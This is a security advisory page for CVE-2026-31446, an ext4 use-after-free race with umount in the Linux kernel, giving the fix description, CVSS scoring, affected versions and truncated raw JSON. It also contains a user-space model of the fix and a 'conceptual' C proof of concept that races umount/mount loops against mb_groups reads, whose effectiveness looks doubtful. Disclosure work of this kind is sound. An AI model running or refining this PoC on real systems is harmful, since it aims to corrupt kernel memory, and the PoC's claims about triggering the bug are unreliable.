Security Vulnerability Report
CVE-2026-31446 CVSS 7.8 HIGH

CVE-2026-31446

Published: 2026-04-22 14:16:38
Last Modified: 2026-05-07 19:21:45
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

ext4: fix use-after-free in update_super_work when racing with umount

Commit b98535d09179 ("ext4: fix bug_on in start_this_handle during umount filesystem") moved ext4_unregister_sysfs() before flushing s_sb_upd_work to prevent new error work from being queued via /proc/fs/ext4/xx/mb_groups reads during unmount. However, this introduced a use-after-free because update_super_work calls ext4_notify_error_sysfs() -> sysfs_notify() which accesses the kobject's kernfs_node after it has been freed by kobject_del() in ext4_unregister_sysfs():

    update_super_work                   ext4_put_super
    -----------------                   --------------
                                        ext4_unregister_sysfs(sb)
                                          kobject_del(&sbi->s_kobj)
                                            __kobject_del()
                                              sysfs_remove_dir()
                                                kobj->sd = NULL
                                                sysfs_put(sd)
                                                  kernfs_put()      // RCU free
    ext4_notify_error_sysfs(sbi)
      sysfs_notify(&sbi->s_kobj)
        kn = kobj->sd                   // stale pointer
        kernfs_get(kn)                  // UAF on freed kernfs_node
                                        ext4_journal_destroy()
                                          flush_work(&sbi->s_sb_upd_work)

Instead of reordering the teardown sequence, fix this by making ext4_notify_error_sysfs() detect that sysfs has already been torn down by checking s_kobj.state_in_sysfs, and skipping the sysfs_notify() call in that case. A dedicated mutex (s_error_notify_mutex) serializes ext4_notify_error_sysfs() against kobject_del() in ext4_unregister_sysfs() to prevent TOCTOU races where the kobject could be deleted between the state_in_sysfs check and the sysfs_notify() call.
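The fix pattern the commit message describes (check s_kobj.state_in_sysfs under s_error_notify_mutex, and skip sysfs_notify() once sysfs is torn down) modelled in user space with pthreads, as an added example that is not kernel code and not part of this report. The sb_info layout, the node stand-in for kernfs_node, run_race() and the thread and call counts are assumptions made for the illustration; only the field and mutex names follow the commit message.

```c
/* Added example, not the kernel's code: a user-space model of the fix
 * pattern in the commit message. Names follow the message
 * (state_in_sysfs, s_error_notify_mutex); the sb_info layout, the node
 * stand-in, run_race() and the counts below are assumptions. */
#include <pthread.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOTIFIERS 4     /* assumed: concurrent update_super_work-style callers */
#define CALLS 20000     /* assumed: notifications attempted per thread */

struct node { long wakeups; };           /* stand-in for kernfs_node */

struct sb_info {
    struct node *sd;                     /* like kobj->sd; NULL after removal */
    bool state_in_sysfs;                 /* like s_kobj.state_in_sysfs */
    pthread_mutex_t s_error_notify_mutex;
};

void sb_register(struct sb_info *sbi) {
    sbi->sd = calloc(1, sizeof *sbi->sd);
    sbi->state_in_sysfs = true;
    pthread_mutex_init(&sbi->s_error_notify_mutex, NULL);
}

/* Modelled on ext4_unregister_sysfs(): clear the flag and free the node
 * under the same mutex the notifier takes, so "flag set" and "node freed"
 * can never be observed together by a notifier. */
void sb_unregister(struct sb_info *sbi) {
    pthread_mutex_lock(&sbi->s_error_notify_mutex);
    sbi->state_in_sysfs = false;
    free(sbi->sd);
    sbi->sd = NULL;
    pthread_mutex_unlock(&sbi->s_error_notify_mutex);
}

/* Fixed ext4_notify_error_sysfs() shape: returns 1 if the notification was
 * delivered, 0 if sysfs was already torn down and the call was skipped. */
int notify_error(struct sb_info *sbi) {
    int delivered = 0;
    pthread_mutex_lock(&sbi->s_error_notify_mutex);
    if (sbi->state_in_sysfs) {
        sbi->sd->wakeups++;              /* node cannot vanish while locked */
        delivered = 1;
    }
    pthread_mutex_unlock(&sbi->s_error_notify_mutex);
    return delivered;
}

struct worker { struct sb_info *sbi; long delivered; long skipped; };

static void *notifier_thread(void *arg) {
    struct worker *w = arg;
    for (int i = 0; i < CALLS; i++) {
        if (notify_error(w->sbi)) w->delivered++; else w->skipped++;
    }
    return NULL;
}

/* Race NOTIFIERS notifier threads against one teardown. Returns 0 when the
 * outcome is consistent (every call either delivered or skipped, and a call
 * after teardown is skipped), nonzero otherwise. Built with AddressSanitizer,
 * removing the lock from sb_unregister() turns this into a reported
 * heap-use-after-free, which is the bug class the kernel fix closes. */
int run_race(void) {
    struct sb_info sbi;
    struct worker w[NOTIFIERS];
    pthread_t t[NOTIFIERS];
    memset(w, 0, sizeof w);
    sb_register(&sbi);
    for (int i = 0; i < NOTIFIERS; i++) {
        w[i].sbi = &sbi;
        pthread_create(&t[i], NULL, notifier_thread, &w[i]);
    }
    sb_unregister(&sbi);                 /* teardown while notifiers run */
    long delivered = 0, skipped = 0;
    for (int i = 0; i < NOTIFIERS; i++) {
        pthread_join(t[i], NULL);
        delivered += w[i].delivered;
        skipped += w[i].skipped;
    }
    if (delivered + skipped != (long)NOTIFIERS * CALLS) return 1;
    if (notify_error(&sbi) != 0) return 2;   /* must skip after teardown */
    pthread_mutex_destroy(&sbi.s_error_notify_mutex);
    return 0;
}

int main(void) {
    int rc = run_race();
    printf("race outcome: %s\n", rc == 0 ? "consistent, no use-after-free" : "inconsistent");
    return rc;
}
```

The point of the model is the ordering inside sb_unregister(): the flag is cleared and the node freed while the notifier's mutex is held, so the flag check in notify_error() and the dereference that follows it are one atomic step relative to teardown. A flag check without the shared lock would still leave the TOCTOU window the commit message names.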

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.10.114, before 5.11) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.15.38, before 5.15.203) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.17.6, before 5.18) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 5.18.1, before 6.1.168) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.2, before 6.6.131) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.7, before 6.12.80) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.13, before 6.18.21) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* (from 6.19, before 6.19.11) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:5.18:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:5.18:rc4:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:5.18:rc5:*:*:*:*:*:* - VULNERABLE
(Version ranges are taken from the raw JSON below, which is truncated after the 5.18 rc5 entry.)
Linux Kernel (mainline and stable branches that carry commit b98535d09179 and do not include the fix)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
/*
 * Conceptual PoC for CVE-2026-31446
 * This code attempts to trigger the race condition between
 * ext4_notify_error_sysfs and ext4_unregister_sysfs.
 * Compile: gcc -o poc cve-2026-31446.c -lpthread
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/mount.h>
#include <string.h>

// Assume an ext4 filesystem is mounted here
#define MOUNT_POINT "/mnt/test_ext4"
#define DEVICE "/dev/sda1"
#define SYSFS_PATH "/proc/fs/ext4/sda1/mb_groups"

void *unmount_thread(void *arg)
{
    (void)arg;
    while (1) {
        // Attempt to unmount to trigger the teardown sequence
        system("umount " MOUNT_POINT " 2>/dev/null");
        // Remount to keep the loop going for testing purposes
        // (in a real scenario, this happens once)
        system("mount " DEVICE " " MOUNT_POINT " 2>/dev/null");
        usleep(10000); // Short delay
    }
    return NULL;
}

void *trigger_sysfs_thread(void *arg)
{
    char buf[1024];
    FILE *fp;
    (void)arg;
    while (1) {
        // Reading mb_groups triggers ext4_error handling which queues update_super_work
        fp = fopen(SYSFS_PATH, "r");
        if (fp) {
            while (fgets(buf, sizeof(buf), fp)) {
                // Consume file to trigger sysfs interaction
            }
            fclose(fp);
        }
        usleep(1000); // High frequency access
    }
    return NULL;
}

int main(void)
{
    pthread_t t1, t2;
    printf("Starting PoC for CVE-2026-31446...\n");
    printf("Ensure %s is mounted and writable.\n", MOUNT_POINT);
    // Create threads to race against each other
    pthread_create(&t1, NULL, unmount_thread, NULL);
    pthread_create(&t2, NULL, trigger_sysfs_thread, NULL);
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31446", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-04-22T14:16:38.340", "lastModified": "2026-05-07T19:21:44.833", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: fix use-after-free in update_super_work when racing with umount\n\nCommit b98535d09179 (\"ext4: fix bug_on in start_this_handle during umount\nfilesystem\") moved ext4_unregister_sysfs() before flushing s_sb_upd_work\nto prevent new error work from being queued via /proc/fs/ext4/xx/mb_groups\nreads during unmount. However, this introduced a use-after-free because\nupdate_super_work calls ext4_notify_error_sysfs() -> sysfs_notify() which\naccesses the kobject's kernfs_node after it has been freed by kobject_del()\nin ext4_unregister_sysfs():\n\n update_super_work ext4_put_super\n ----------------- --------------\n ext4_unregister_sysfs(sb)\n kobject_del(&sbi->s_kobj)\n __kobject_del()\n sysfs_remove_dir()\n kobj->sd = NULL\n sysfs_put(sd)\n kernfs_put() // RCU free\n ext4_notify_error_sysfs(sbi)\n sysfs_notify(&sbi->s_kobj)\n kn = kobj->sd // stale pointer\n kernfs_get(kn) // UAF on freed kernfs_node\n ext4_journal_destroy()\n flush_work(&sbi->s_sb_upd_work)\n\nInstead of reordering the teardown sequence, fix this by making\next4_notify_error_sysfs() detect that sysfs has already been torn down\nby checking s_kobj.state_in_sysfs, and skipping the sysfs_notify() call\nin that case. 
A dedicated mutex (s_error_notify_mutex) serializes\next4_notify_error_sysfs() against kobject_del() in ext4_unregister_sysfs()\nto prevent TOCTOU races where the kobject could be deleted between the\nstate_in_sysfs check and the sysfs_notify() call."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.10.114", "versionEndExcluding": "5.11", "matchCriteriaId": "06D67EC3-92E2-452F-9826-4CF918434F2B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.15.38", "versionEndExcluding": "5.15.203", "matchCriteriaId": "237A1663-E334-49A1-A031-5A8D1A1782AD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.17.6", "versionEndExcluding": "5.18", "matchCriteriaId": "49134C93-AD6F-411A-A4B1-E5E509EEFB00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.18.1", "versionEndExcluding": "6.1.168", "matchCriteriaId": "0292DDCD-3BB0-457C-AB09-7796072CC1DB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.6.131", "matchCriteriaId": 
"CE6ED4D4-0046-4573-BFA9-D64143B6A89F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.80", "matchCriteriaId": "97EB19EC-A11E-49C6-9D2F-6F6EC6CB98B6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.21", "matchCriteriaId": "ED39847A-3B46-4729-B7CA-B2C30B9FA8FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.11", "matchCriteriaId": "4CA2E747-A9EC-4518-9AA2-B4247FC748B7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.18:-:*:*:*:*:*:*", "matchCriteriaId": "0384FA0A-DE99-48D7-84E3-46ED0C3B5E03"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.18:rc4:*:*:*:*:*:*", "matchCriteriaId": "DA5F085D-52F3-4EE2-8353-455D1A6FE073"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:5.18:rc5:*:*:*:*:*:*", "matchCriteriaId": "D6EE5B78-0D83-4715-89 ... (truncated)